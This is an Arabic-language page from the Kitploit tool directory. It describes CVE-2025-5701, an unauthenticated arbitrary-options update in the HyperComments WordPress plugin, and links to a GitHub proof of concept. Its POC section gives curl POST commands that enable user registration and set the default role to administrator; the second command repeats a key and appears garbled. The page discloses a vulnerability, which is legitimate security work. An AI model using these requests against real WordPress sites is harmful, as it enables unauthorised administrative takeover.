Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/randomrobbiebf/cve-2025-5701
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقسوء التكوين
GitHubrandomrobbiebf/cve-2025-5701

CVE-2025-5701

HyperComments <= 1.2.2 - غير موثّق (مشترك+) تحديث الخيارات التعسفي

عرض المستودع
13منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-5701

إضافة HyperComments <= 1.2.2 - تحديث غير مصرح به للخيارات التعسفية (يمكن للمشتركين+)

الوصف

إضافة HyperComments لووردبريس عرضة لتعديل غير مصرح به للبيانات مما قد يؤدي إلى تصعيد الامتيازات بسبب عدم وجود فحص للصلاحية في دالة hc_request_handler في جميع الإصدارات حتى 1.2.2 شاملة. هذا يتيح للمهاجمين غير الموثّقين تحديث خيارات تعسفية على موقع ووردبريس. يمكن استغلال ذلك لتحديث الدور الافتراضي للتسجيل إلى مسؤول وتمكين تسجيل المستخدمين ليحصل المهاجمون على وصول إداري للموقع الضعيف.

التفاصيل

  • النوع: إضافة
  • المعرف: hypercomments
  • الإصدار المتأثر: 1.2.2
  • درجة CVSS: 9.8
  • تقييم CVSS: حرج
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2025-5701
  • الحالة: مغلق

POC

root@kitploit:~
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
  -d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
  -H "Content-Type: application/x-www-form-urlencoded"
root@kitploit:~
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
  -d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
  -H "Content-Type: application/x-www-form-urlencoded"
تنزيل الأداة